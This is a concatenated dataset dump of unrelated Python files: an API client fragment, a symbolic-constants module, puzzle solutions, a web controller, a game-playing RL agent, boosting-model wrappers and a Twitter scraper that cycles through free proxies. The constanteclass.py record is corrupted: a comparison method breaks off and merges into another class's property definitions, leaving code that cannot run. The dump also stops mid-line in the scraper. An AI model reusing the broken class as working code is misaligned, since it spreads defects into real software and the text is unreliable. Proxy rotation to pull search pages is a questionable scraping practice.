plaintStr.encode('UTF-8'), hashlib.sha512).digest())\n h = {'Timestamp': dt,\n 'Authorization': f'CashboxAuth {PublicKey.decode(\"UTF-8\")}:{signature.decode(\"UTF-8\")}', 'Content-Type': 'application/json', 'Connection': 'close'}\n r = requests.get(url, headers=h)\n #print(r.text)\n sleep(1)\n if url.find('confirm') == -1:\n return(r.json())\n else:\n return(r.text)\n\n\nif __name__ == '__main__':\n main()\n\n# GET:\n#Timestamp: 1588925300544\n# Authorization: CashboxAuth 'ваш PublicKey':n3RDovb0Ft4iN8wo6MEjsldaI17q7HrdUBwzSyK7hRI/UpcVBEckW6qlnNZg48cbz+crst8BbROXnWCGJmkOOA==\n\n# POST:\n#Timestamp: 1588925365555\n# Authorization: CashboxAuth 'ваш PublicKey':O4t+V6/6c2gXlsUke7LF0N6OBgzF20I3v9J+59VBORDEz+hH/iYU+FMr4wyvBJjnVlufn8xuncArFT5hR31+og==\n# Content-Type: application/json\n","sub_path":"cashbox.py","file_name":"cashbox.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"86373375","text":"\"\"\"\r\nModulo para constantes arbitraria, para uso en calculos simbolicos\r\n\"\"\"\r\nimport math, cmath, typing, operator\r\nfrom abc import abstractmethod\r\nfrom fractions import Fraction\r\nfrom numbers import Number, Real, Complex, Rational\r\nfrom itertools import chain\r\nfrom collections import namedtuple\r\n\r\nPartes_de_Constante = namedtuple(\"Partes_de_Constante\",\"a m e C name\")\r\n\r\n\r\n__all__ =['ConstanteABC','ConstanteBase','sqrt','evaluar_constante','evaluar_formula']\r\n\r\nclass ConstanteABC(Number):\r\n '''Constante numerica arbitraria de forma: (a+mC**e) con a,m,e conocidos'''\r\n \r\n @property\r\n @abstractmethod\r\n def a(self):\r\n \"\"\"(a+mC**e) -> a\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def m(self):\r\n \"\"\"(a+mC**e) -> m\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def e(self):\r\n \"\"\"(a+mC**e) -> e\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def C(self):\r\n \"\"\"(a+mC**e) -> C\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def name(self):\r\n \"\"\"Nombre de esta constante\"\"\"\r\n raise NotImplementedError\r\n\r\n def partes(self):\r\n \"\"\"Regresa una tupla con las partes constitullentes de esta constante\"\"\"\r\n return Partes_de_Constante(a=self.a, m=self.m, e=self.e, C=self.C, name=self.name)\r\n\r\n def __call__(self,valor):\r\n return evaluar_constante(self,valor,self.name)\r\n\r\n def __repr__(self):\r\n a = ('a='+repr(self.a) ) if self.a else ''\r\n m = ('m='+repr(self.m) ) if self.m!=1 else ''\r\n e = ('e='+repr(self.e) ) if self.e!=1 else ''\r\n C = ('C='+repr(self.C) ) if self.C else ''\r\n return '{}({})'.format(self.__class__.__qualname__, ', '.join(chain([repr(self.name)],filter(None,(a,m,e,C)))) )\r\n\r\n def __str__(self):\r\n a,m,e,C,name = self.partes()\r\n add = str(a) if a else ''\r\n try:\r\n sig = '+' if m>=0 else ''\r\n except TypeError:\r\n sig = '+'\r\n con = ( str(m if m!=-1 else '-') if m!=1 else '' ) + (name if not C else str(C))\r\n exp = str(e) if e != 1 else ''\r\n if exp and exp.startswith(\"-\"):\r\n exp = '({exp})'.format(exp=exp)\r\n resul=''\r\n if add:\r\n resul += add + ' ' + sig\r\n resul += con\r\n if exp:\r\n resul += '**'+exp\r\n return '({resul})'.format(resul=resul)\r\n \r\n def __lt__(self,otro):\r\n \"\"\"C a\"\"\"\r\n return self._a\r\n\r\n @property\r\n def m(self):\r\n \"\"\"(a+mC**e) -> m\"\"\"\r\n return self._m\r\n\r\n @property\r\n def e(self):\r\n \"\"\"(a+mC**e) -> e\"\"\"\r\n return self._e\r\n\r\n @property\r\n def C(self):\r\n \"\"\"(a+mC**e) -> C\"\"\"\r\n return self._c\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Nombre de esta constante\"\"\"\r\n return self._name\r\n\r\ndef rational_div_maker(div):\r\n def rational_div(a,b):\r\n \"\"\"Si ambos argumentos son Racionales, entonces regresa Fraction(a,b)\r\n sino regresa div(a,b)\"\"\"\r\n if isinstance(a,Rational) and isinstance(b,Rational):\r\n return Fraction(a,b)\r\n return div(a,b)\r\n return rational_div\r\n\r\ndef sqrt(x:typing.Union[Real,Complex,ConstanteABC], _fraction_resul=False) -> typing.Union[Real,Complex,ConstanteABC]:\r\n \"\"\"Calcula la raiz cuadrada de x, segun el valor de x\r\n retornando un número complejo o una Constante de ser necesario\r\n\r\n _fraction_resul si es True y x es una fraccion no negativa, entoces el\r\n resultado sera una fraccion\"\"\"\r\n if isinstance(x,ConstanteABC):\r\n return x**Fraction(1,2)\r\n try:\r\n if _fraction_resul and x>=0 and isinstance(x,Fraction):\r\n n = Fraction( *(sqrt(x.numerator).as_integer_ratio() ) )\r\n d = Fraction( *(sqrt(x.denominator).as_integer_ratio() ) )\r\n return n/d\r\n return math.sqrt(x) if x>=0 else cmath.sqrt(x)\r\n except TypeError:\r\n return cmath.sqrt(x)\r\n\r\ndef evaluar_constante(cons:ConstanteABC,valor:Number,name:str=None) -> typing.Union[Number, ConstanteABC]:\r\n \"\"\"Evalua el valor de la formula de la constante dada con el valor\r\n otorgado para la constante del nombre dado, que en caso de ser\r\n omitido sera cons.name\"\"\"\r\n if not isinstance(cons, ConstanteABC):\r\n return cons\r\n if name is None:\r\n return evaluar_constante(cons,valor,cons.name)\r\n if cons.C:\r\n c = evaluar_constante(cons.C,valor,name)\r\n else:\r\n c = valor if cons.name == name else cons.__class__(cons.name)\r\n a = evaluar_constante(cons.a,valor,name)\r\n m = evaluar_constante(cons.m,valor,name)\r\n e = evaluar_constante(cons.e,valor,name)\r\n if e == 0.5:\r\n return sqrt(c)*m + a\r\n return m*c**e + a \r\n\r\ndef evaluar_formula(formula:ConstanteABC,*valores:[(\"nombre\",\"valor\")]) -> typing.Union[Number, ConstanteABC]:\r\n \"\"\"Evalua la formula contenida en la constante dada.\"\"\"\r\n resul = formula\r\n for c,v in valores:\r\n resul = evaluar_constante(resul,v,c)\r\n return resul\r\n\r\n","sub_path":"constanteclass.py","file_name":"constanteclass.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446366477","text":"infile = open(\"day3.txt\",\"r\")\ninfile2 = open(\"day3.txt\",\"r\")\ncoordDict = {}\n\ndef lineFormat(line):\n tempList = line.split(\" \")\n startX,startY = tempList[2].split(\",\") #lots of string formating...\n startY = startY.replace(\":\",\"\")\n startX = 1 + int(startX)\n startY = 1 + int(startY)\n factorX, factorY = tempList[3].split(\"x\")\n return startX, startY, factorX, factorY\n\n\nfor line in infile:\n startX, startY, factorX, factorY = lineFormat(line)\n\n for x in range(startX,int(factorX)+startX): #goes through a range from (the start of x) to (the length of x + the start of x)\n for y in range(startY,int(factorY)+startY):\n z = str(x) + \":\" + str(y)\n if z not in coordDict:\n coordDict[z] = 1\n\n else:\n coordDict[z] += 1\n\n# for key,value in coordDict.items():\n# if(value > 1):\n# dubbedClaims += 1\n\nfor line in infile2:\n isAnswer = True\n startX, startY, factorX, factorY = lineFormat(line)\n\n for x in range(startX,int(factorX)+startX): #goes through a range from (the start of x) to (the length of x + the start of x)\n for y in range(startY,int(factorY)+startY):\n z = str(x) + \":\" + str(y)\n if coordDict[z] != 1:\n isAnswer = False\n '''\n as the program loops through the file, a boolean starts out as true and then becomes false if\n the line's claims hit a claim that has a dictionary value that is not 1. If all the dictionary\n values of the line's claims are 1, then the isAnswer remains true for the if statement below.\n '''\n if(isAnswer):\n print(\"ANSWER: \" + line)\n","sub_path":"Advent of Code 2018/day3/day3p2.py","file_name":"day3p2.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288098990","text":"# @author: Gunnar Schaefer\n\nfrom tg import config, expose, flash, redirect, request, response\nfrom tg.i18n import ugettext as _, lazy_ugettext as l_\nfrom repoze.what import predicates\n\nimport os\nimport time\nimport shlex\nimport subprocess\nfrom collections import OrderedDict\n\nimport nimsutil\nfrom nimsgears import model\nfrom nimsgears.model import *\n\nfrom nimsgears.lib.base import BaseController\nfrom nimsgears.controllers.access import AccessController\nfrom nimsgears.controllers.browse import BrowseController\nfrom nimsgears.controllers.search import SearchController\nfrom nimsgears.controllers.groups import GroupsController\n\nimport json\n\n__all__ = ['AuthController']\n\n\nclass AuthController(BaseController):\n\n access = AccessController()\n browse = BrowseController()\n search = SearchController()\n groups = GroupsController()\n\n allow_only = predicates.not_anonymous(msg=l_('You must be logged in to view this page.'))\n\n # FIXME: handle deactivated users\n #active_user = predicates.in_group('users', msg=l_('Your account is inactive. You can request activation below.'))\n\n def _not_active_user(msg):\n flash(msg)\n redirect('/auth/activate')\n\n @expose()\n def index(self):\n redirect('/auth/status')\n\n @expose('nimsgears.templates.activate')\n def activate(self, **kwargs):\n return self.prefs()\n\n @expose('nimsgears.templates.toggle_admin')\n def toggle_admin(self, came_from):\n user = request.identity['user']\n DBSession.add(user)\n user.admin_mode = not user.admin_mode\n redirect(came_from)\n\n @expose('nimsgears.templates.prefs')\n def prefs(self, **kwargs):\n user = request.identity['user']\n\n if kwargs:\n DBSession.add(user)\n for key, value in kwargs.iteritems():\n setattr(user, key, value)\n flash(l_('Your settings have been updated.'))\n\n if not user.firstname or not user.lastname or not user.email:\n ldap_firstname, ldap_lastname, ldap_email = nimsutil.ldap_query(user.uid)\n firstname = user.firstname or ldap_firstname\n lastname = user.lastname or ldap_lastname\n email = user.email or ldap_email\n\n prefs = OrderedDict()\n prefs['firstname'] = ('First Name', firstname)\n prefs['lastname'] = ('Last Name', lastname)\n prefs['email'] = ('Email Address', email)\n\n return dict(page='prefs', prefs=prefs)\n\n @expose('nimsgears.templates.status')\n def status(self):\n #if not predicates.in_group('active_users').is_met(request.environ):\n # flash(l_('Your account is not yet active.'))\n # redirect('/auth/prefs')\n\n failed_jobs = Job.query.filter(Job.status == u'failed').all()\n active_jobs = Job.query.filter(Job.status == u'active').all()\n new_jobs = Job.query.filter(Job.status == u'new').all()\n return dict(\n page='status',\n failed_jobs=failed_jobs,\n active_jobs=active_jobs,\n new_jobs=new_jobs,\n )\n\n @expose('nimsgears.templates.admin')\n def admin(self):\n return dict(page='admin', params={})\n\n @expose(content_type='image/png')\n def image(self, *args):\n return open('/tmp/image.png', 'r')\n\n @expose(content_type='application/octet-stream')\n def speed(self, *args):\n #return open('/boot/kernel/kernel.symbols', 'r')\n return subprocess.Popen(shlex.split('tar -cLf - %s' % '/boot/kernel/kernel.symbols'), stdout=subprocess.PIPE, cwd='/tmp').stdout\n\n @expose(content_type='application/x-tar')\n def download(self, **kwargs):\n user = request.identity['user']\n user_path = '%s/%s' % (config.get('links_path'), 'superuser' if user.is_superuser else user.uid)\n tar_dirs = None\n if 'id_dict' in kwargs and 'sess' in kwargs['id_dict']:\n query_type = Session\n id_list = [int(id) for id in json.loads(kwargs['id_dict'])['sess']]\n db_res = (DBSession.query(Session, Experiment, ResearchGroup, Dataset, Epoch)\n .join(Subject, Session.subject)\n .join(Experiment, Subject.experiment)\n .join(ResearchGroup, Experiment.owner)\n .join(Epoch, Session.epochs)\n .join(Dataset, Epoch.datasets)\n .filter((Dataset.kind == u'secondary') | (Dataset.kind == u'derived'))\n .filter(Session.id.in_(id_list))\n .all())\n tar_dirs = ['%s/%s/%s/%s/%s' % (r.ResearchGroup.gid, r.Experiment.name, r.Session.name, r.Epoch.name, r.Dataset.name) for r in db_res]\n elif 'id_dict' in kwargs and 'dataset' in kwargs['id_dict']:\n query_type = Dataset\n id_list = [int(id) for id in json.loads(kwargs['id_dict'])['dataset']]\n db_res = (DBSession.query(Dataset, Epoch, Session, Experiment, ResearchGroup)\n .join(Epoch, Dataset.container)\n .join(Session, Epoch.session)\n .join(Subject, Session.subject)\n .join(Experiment, Subject.experiment)\n .join(ResearchGroup, Experiment.owner)\n .filter(Dataset.id.in_(id_list))\n .all())\n tar_dirs = ['%s/%s/%s/%s/%s' % (r.ResearchGroup.gid, r.Experiment.name, r.Session.name, r.Epoch.name, r.Dataset.name) for r in db_res]\n if tar_dirs:\n #redirect('/%s/download.php?%s' % (user_path, '&'.join('dirs[%d]=%s' %(i, p) for i, p in enumerate(tar_dirs))))\n tar_proc = subprocess.Popen(shlex.split('tar -cLf - -C %s %s' % (user_path, ' '.join(tar_dirs))), stdout=subprocess.PIPE)\n response.headerlist.append(('Content-Disposition', 'attachment; filename=%s_%d' % ('nims', time.time())))\n return tar_proc.stdout\n","sub_path":"nimsgears/controllers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480604922","text":"from pommerman.agents import BaseAgent\nimport numpy as np\nimport torch\n\nfrom pommerman import constants\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom pommerman.agents import dqn_agent_utilities as filter\nfrom pommerman.agents import filter_action # Chao's rules\n\n# provide input channels\n\nN_S = None\nN_A = None\n\nCENTRALIZED_CRITIC = True\nFILTER_RULES = True\n\ndef v_wrap(np_array, dtype=np.float32):\n if np_array.dtype != dtype:\n np_array = np_array.astype(dtype)\n return torch.from_numpy(np_array)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n board_size = 11\n self.distribution = torch.distributions.Categorical\n self.a_dim = 6\n\n self.cnn_last_dim = 32\n self.post_cnn_layer_dim = 128\n\n self.lin_input = self.cnn_last_dim * board_size * board_size\n\n # Add LSTMCell here - see how the hidden state will be reset each turn\n # if LSTM_ENABLED:\n # self.lstm = nn.LSTMCell(self.lin_input, self.post_cnn_layer_dim)\n # else:\n # self.post_cnn_layer = nn.Linear(self.lin_input, self.post_cnn_layer_dim )\n # set_init([self.post_cnn_layer])\n\n if CENTRALIZED_CRITIC: # TODO an LSTM can fit into this ....\n self.c_critic_conv1 = nn.Conv2d(20, 32, kernel_size=3, stride=1, padding=1) # TODO team single critic observation has 20 channels\n self.c_critic_conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.c_critic_conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.c_critic_conv4 = nn.Conv2d(32, self.cnn_last_dim, kernel_size=3, stride=1, padding=1)\n self.c_critic_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.c_critic_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.c_critic_ln3 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.c_critic_head = nn.Linear(self.post_cnn_layer_dim, 1)\n\n self.conv1 = nn.Conv2d(19, 32, kernel_size=3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv4 = nn.Conv2d(32, self.cnn_last_dim, kernel_size=3, stride=1, padding=1)\n\n # Branch 1 for the first trained agent\n self.agent1_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.agent1_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent1_ln3 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent1_head_actor = nn.Linear(self.post_cnn_layer_dim,self.a_dim)\n self.agent1_head_critic = nn.Linear(self.post_cnn_layer_dim,1)\n\n # Branch 2 for the second trained agent\n self.agent2_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.agent2_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent2_ln3 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent2_head_actor = nn.Linear(self.post_cnn_layer_dim, self.a_dim)\n self.agent2_head_critic = nn.Linear(self.post_cnn_layer_dim, 1)\n\n def forward(self, x, agent_index=None, hx=None, cx=None): # pass agent id here to diverge on the branch - also pass ffa ...\n #TODO first teammate index can be 0 or 1 - second teammate index can be 2 or 3\n\n #print(f\" size of hx is {hx.shape}\")\n\n if CENTRALIZED_CRITIC and agent_index is None: # return centralized critic based on fully observable state information\n #print('passing here')\n y = F.elu(self.c_critic_conv1(x)) # TODO input here will be ffa state\n y = F.elu(self.c_critic_conv2(y))\n y = F.elu(self.c_critic_conv3(y))\n y = F.elu(self.c_critic_conv4(y))\n\n y = y.view(-1, self.lin_input) # to fix the shape before fully connected layer\n\n y = F.elu(self.c_critic_ln1(y))\n y = F.elu(self.c_critic_ln2(y))\n y = F.elu(self.c_critic_ln3(y))\n return self.c_critic_head(y) # return a single central value estimate ...\n\n x = F.elu(self.conv1(x))\n x = F.elu(self.conv2(x))\n x = F.elu(self.conv3(x))\n x = F.elu(self.conv4(x))\n\n x = x.view(-1, self.lin_input) # to fix the shape before fully connected layer\n\n # if LSTM_ENABLED:\n # hx, cx = self.lstm(x, (hx,cx))\n # x = hx\n # else:\n # x = F.elu(self.post_cnn_layer(x))\n\n if agent_index in (0,1): # return first agent actor and LOCAL critic\n x = F.elu(self.agent1_ln1(x))\n x = F.elu(self.agent1_ln2(x))\n x = F.elu(self.agent1_ln3(x))\n agent1_logits = self.agent1_head_actor(x)\n agent1_values = self.agent1_head_critic(x)\n return agent1_logits, agent1_values, hx,cx\n else: # return second agent actor and LOCAL critic\n x = F.elu(self.agent2_ln1(x))\n x = F.elu(self.agent2_ln2(x))\n x = F.elu(self.agent2_ln3(x))\n agent2_logits = self.agent2_head_actor(x)\n agent2_values = self.agent2_head_critic(x)\n return agent2_logits, agent2_values, hx, cx\n\n def choose_action(self, s, agent_index, hx=None, cx=None, value_viz_buffer=None, policy_viz_buffer=None):\n #print(s)\n # print(f\"set to eval {s.shape}\")\n self.eval() # to freeze weights\n logits, value, hx, cx = self.forward(s, agent_index, hx, cx)\n\n prob = F.softmax(logits, dim=1).data\n #prob_np = prob.data.numpy()\n #print(f\"probs are {prob_np}\")\n #print(f\"probs are {prob_np[0][0]}\")\n\n if value_viz_buffer is not None: # TODO these parts have been added to log game data for visualization\n value_viz_buffer.append((value.data.numpy().flatten()))\n if policy_viz_buffer is not None:\n policy_viz_buffer.append((prob.data.numpy().flatten()))\n\n m = self.distribution(prob)\n\n #print(f\"state value is {value}\")\n\n return m.sample().numpy()[0], hx, cx, prob.data.numpy()[0] # also return probs\n\n\nclass bilal_ccritic_bignn_Alt_Agent(BaseAgent):\n\n def __init__(self, *args, **kwargs):\n super(bilal_ccritic_bignn_Alt_Agent, self).__init__(*args, **kwargs)\n self.gnet = Net()\n self.gnet.load_state_dict(torch.load('bilal_ccritic_bignn40K.pt'))\n self.game_step = 0\n\n def correct_nn_with_rules(self, obs, nn_intended_action, nn_probs):\n safe_actions = filter_action.get_filtered_actions(obs)\n if nn_intended_action not in safe_actions:\n nn_probs[np.setdiff1d([0, 1, 2, 3, 4, 5], safe_actions)] = 0.00000000000000000001 # added this due to 'fewer non-zero with p> 0 than size error'\n new_action = np.random.choice(6,1,replace=False,p=nn_probs/(sum(nn_probs)))\n if new_action is None:\n print(\"ERROR BY NONE Action\")\n return new_action\n else:\n return nn_intended_action\n\n def act(self, obs, action_space):\n\n our_agent_pos = np.array(obs['position'])\n current_board = np.array(obs['board']) # done\n #print('agent pos', our_agent_pos[0])\n #print('agent pos', our_agent_pos[1])\n\n our_agent_id = int(current_board[our_agent_pos[0]][our_agent_pos[1]])#\n #print('our agent id is ', our_agent_id)\n\n tm_filtered_state = v_wrap(filter.generate_NN_input_with_ids(our_agent_id, obs, self.game_step)).unsqueeze(0) # TODO passed 10 as agent id - fix that ...\n tm_nn_action, _, _, NN_probs = self.gnet.choose_action(tm_filtered_state, our_agent_id-10) # overload the first action\n if FILTER_RULES:\n tm_nn_action = self.correct_nn_with_rules(obs, tm_nn_action, NN_probs)\n\n self.game_step = self.game_step + 1\n\n return int(tm_nn_action)\n\n\n def episode_end(self, reward):\n self.game_step = 0\n","sub_path":"pommerman/agents/bilal_ccritic_bignn_alt.py","file_name":"bilal_ccritic_bignn_alt.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400204031","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: AC4Fun\n@license: huifangshuyuan.com\n@contact: ximuzmzj@gmail.com\n@file: 15. 3Sum.py\n@time: 2022-01-09 11:08\n@desc: doc\nGiven an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n\nNotice that the solution set must not contain duplicate triplets.\n\n\n\nExample 1:\n\nInput: nums = [-1,0,1,2,-1,-4]\nOutput: [[-1,-1,2],[-1,0,1]]\nExample 2:\n\nInput: nums = []\nOutput: []\nExample 3:\n\nInput: nums = [0]\nOutput: []\n\n\nConstraints:\n\n0 <= nums.length <= 3000\n-105 <= nums[i] <= 105\n\"\"\"\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n nums.sort()\n result = []\n for i in range(n):\n # 与上一次的循环中的值不同\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n k = n - 1\n target = -nums[i]\n for j in range(i + 1, n):\n # print(\"i,j,k, result\", i, j, k, result)\n # 与上一次的循环中的值不同\n if j > i + 1 and nums[j - 1] == nums[j]:\n continue\n while k > j and nums[j] + nums[k] > target:\n k = k - 1\n if j == k:\n break\n if nums[j] + nums[k] == target:\n result.append([nums[i], nums[j], nums[k]])\n return result\n\n\n\n\n","sub_path":"leetcode/15. 3Sum.py","file_name":"15. 3Sum.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"95878927","text":"import numpy as np\nimport lightgbm as lgb\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\n\n\nclass Model:\n def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n self.params = params\n self.num_boost = num_boost\n self.early_stopping_rounds = early_stopping_rounds\n self.verbose = verbose\n\n\nclass Lightgbm(Model):\n def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n super().__init__(params, num_boost, early_stopping_rounds, verbose)\n\n def classifier(self, multi_class=False):\n self.model = lgb.LGBMClassifier(**self.params)\n if \"metric\" not in self.params.keys():\n if multi_class is False:\n self.params[\"metric\"] = \"auc\"\n else:\n self.params[\"metric\"] = \"multi_logloss\"\n\n def regressor(self):\n self.model = lgb.LGBMRegressor(**self.params)\n if \"metric\" in self.params.keys():\n self.params[\"metric\"] = \"rmse\"\n\n def fit(self, X_train, y_train, X_val, y_val):\n self.model.fit(\n X_train,\n y_train,\n eval_set=[(X_val, y_val)],\n eval_metric=self.params[\"metric\"],\n early_stopping_rounds=self.early_stopping_rounds,\n verbose=self.verbose,\n )\n\n # `.predict()` means `.predict_proba()`\n def predict(self, X_val, X_test, multi_class=False):\n assert (\n type(self.model) is lgb.sklearn.LGBMClassifier\n or type(self.model) is lgb.sklearn.LGBMRegressor\n ), print(\n \"model should be lightgbm.sklearn.LGBMClassifier or lightgbm.sklearn.LGBMRegressor\"\n )\n\n if type(self.model) is lgb.sklearn.LGBMClassifier:\n if multi_class is False:\n self.y_pred_val = self.model.predict_proba(X_val)[:, 1]\n self.y_pred_test = self.model.predict_proba(X_test)[:, 1]\n else:\n self.y_pred_val = np.argmax(self.model.predict_proba(X_val), axis=1)\n self.y_pred_test = np.argmax(self.model.predict_proba(X_test), axis=1)\n elif type(self.model) is lgb.sklearn.LGBMRegressor:\n self.y_pred_val = self.model.predict(X_val)\n self.y_pred_test = self.model.predict(X_test)\n return self.y_pred_val, self.y_pred_test\n\n def evaluate(self, y_val, y_pred_val, multi_class=False):\n assert (\n type(self.model) is lgb.sklearn.LGBMClassifier\n or type(self.model) is lgb.sklearn.LGBMRegressor\n ), print(\n \"model should be lightgbm.sklearn.LGBMClassifier or lightgbm.sklearn.LGBMRegressor\"\n )\n if type(self.model) is lgb.sklearn.LGBMClassifier:\n if multi_class is False:\n self.score_val = roc_auc_score(y_val, y_pred_val)\n else:\n # TODO: 多クラス分類のベース評価指標は?\n # self.score_val = macro_f1(y_val, y_pred_val)\n print(\"多クラス分類のベース評価指標は?\")\n elif type(self.model) is lgb.sklearn.LGBMRegressor:\n self.score_val = mean_squared_error(y_val, y_pred_val) ** 0.5\n\n def get_model(self):\n return self.model\n\n def get_predict(self, test=True):\n if test is True:\n return self.y_pred_test\n else:\n return self.y_pred_val\n\n def get_score(self):\n return self.score_val\n\n\nclass Xgboost(Lightgbm):\n def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n super().__init__(params, num_boost, early_stopping_rounds, verbose)\n\n def classifier(self, multi_class=False):\n self.model = xgb.XGBClassifier(**self.params)\n if \"metric\" not in self.params.keys():\n if multi_class is False:\n self.params[\"metric\"] = \"auc\"\n else:\n self.params[\"metric\"] = \"multi_logloss\"\n\n def regressor(self):\n self.model = xgb.XGBRegressor(**self.params)\n if \"metric\" in self.params.keys():\n self.params[\"metric\"] = \"rmse\"\n\n def fit(self, X_train, y_train, X_val, y_val):\n super().fit(X_train, y_train, X_val, y_val)\n\n def predict(self, X_val, X_test):\n super().predict(X_val, X_test)\n\n def evaluate(self, y_val, y_pred_val):\n assert (\n type(self.model) is xgb.sklearn.XGBClassifier\n or type(self.model) is xgb.sklearn.XGBRegressor\n ), print(\n \"model should be xgboost.sklearn.XGBClassifier or xgboost.sklearn.XGBRegressor\"\n )\n if type(self.model) is xgb.sklearn.XGBClassifier:\n self.score_val = roc_auc_score(y_val, y_pred_val)\n elif type(self.model) is xgb.sklearn.XGBRegressor:\n self.score_val = mean_squared_error(y_val, y_pred_val) ** 0.5\n","sub_path":"py/v1/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384590137","text":"from bs4 import BeautifulSoup\nimport requests\nimport sys\nimport json\nfrom itertools import cycle\n\n\ndef get_proxies(proxy_url='https://free-proxy-list.net/'):\n \n \"\"\" Extract proxy from web site and create proxy pool\n Source: https://github.com/taspinar/twitterscraper/blob/master/twitterscraper/query.py\n \"\"\"\n \n response = requests.get(proxy_url)\n soup = BeautifulSoup(response.text, 'lxml')\n table = soup.find('table',id='proxylisttable')\n list_tr = table.find_all('tr')\n list_td = [elem.find_all('td') for elem in list_tr]\n list_td = list(filter(None, list_td))\n list_ip = [elem[0].text for elem in list_td]\n list_ports = [elem[1].text for elem in list_td]\n list_proxies = [':'.join(elem) for elem in list(zip(list_ip, list_ports))]\n \n proxy_pool = cycle(list_proxies )\n \n return proxy_pool \n\n\ndef get_this_page_tweets(soup, searched_tweet_ids=[]):\n\n #res = soup.find_all(string=\"Bu aramayla ilgili hiç sonuç çıkmadı.\")\n \n replies = retweets = likes = tweet_count = 0\n \n tweets = soup.find_all('li', 'js-stream-item')\n \n for tweet in tweets:\n \n t_id = tweet[\"data-item-id\"]\n \n if t_id not in searched_tweet_ids:\n \n replies += int(tweet.find(\n 'span', 'ProfileTweet-action--reply u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n retweets += int(tweet.find(\n 'span', 'ProfileTweet-action--retweet u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n likes += int(tweet.find(\n 'span', 'ProfileTweet-action--favorite u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n #html = str(tweet.find('p', 'tweet-text')) or \"\"\n print(t_id,tweet_count,replies, retweets, likes )\n \n searched_tweet_ids.append(t_id)\n \n print(\"here\", len(searched_tweet_ids))\n tweet_count = len(searched_tweet_ids)\n return searched_tweet_ids,tweet_count,replies, retweets, likes\n\ndef get_tweets_data(tweet_id, soup):\n \n proxy = next(proxy_pool)\n print('Parsing result for ',tweet_id,' proxy : ', proxy)\n searched_tweet_ids = []\n searched_tweet_ids, tweet_count, replies, retweets, likes = get_this_page_tweets(soup,searched_tweet_ids)\n if soup.find(\"li\", {\"class\": \"js-stream-item stream-item stream-item\"}) is not None:\n next_pointer = soup.find_all(\"li\", {\"class\": \"js-stream-item stream-item stream-item\"})[-1][\"data-item-id\"]\n query = \"https://twitter.com/trt2tv/status/{}\".format(tweet_id)\n \n while True:\n \n next_url = \"https://twitter.com/i/search/timeline?f=tweets&vertical=%27%20\\%20%27default&include_available_features=1&include_entities=1&%27%20\\%20%27reset_error_state=false&src=typd&max_position={}&q={}&l=tr%27\".format(next_pointer,query)\n next_response = None\n try:\n next_response = requests.get(next_url, headers = {'User-Agent': 'Mozilla/5.0'}, proxies={\"http\": proxy})\n \n if next_response.status_code != 200:\n print(\"Non success status code returned \"+str(next_response.status_code))\n pass\n else:\n print('Response : ', next_response)\n \n except Exception as e:\n # in case there is some issue with request. None encountered so far.\n print(e)\n return tweet_count, replies, retweets, likes\n \n tweets_data = next_response.text\n tweets_obj = json.loads(tweets_data)\n \n print(\"has more\",tweets_obj[\"has_more_items\"],\" and min pos\", tweets_obj[\"min_position\"])\n \n if tweets_obj[\"has_more_items\"] and tweets_obj[\"min_position\"]:\n # using two checks here bcz in one case 